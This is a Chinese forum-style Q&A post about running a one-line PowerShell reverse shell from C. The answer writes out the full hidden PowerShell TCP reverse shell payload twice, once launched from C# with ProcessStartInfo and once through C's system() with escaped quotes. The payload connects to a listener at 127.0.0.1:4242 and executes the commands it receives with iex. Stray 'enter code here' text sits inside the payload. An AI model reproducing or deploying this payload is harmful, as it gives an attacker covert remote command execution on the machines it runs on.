如何使用C语言运行这个一行powershell反向shell

我不能100%确定，但不久前我也遇到了类似的问题，从C#中删除了一个powershell脚本。也许类似的东西在c中也有效。C#代码：

var startInfo = new ProcessStartInfo()
{
FileName = "powershell.exe",
Arguments = $"-W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"",
UseShellExecute = false
};
Process.Start(startInfo);

仅仅通过epowershell进入system("");是不够的-您必须用:屏蔽每个嵌入的"

system("powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"");

您应该查看该命令——您可能不希望其中包含enter code here。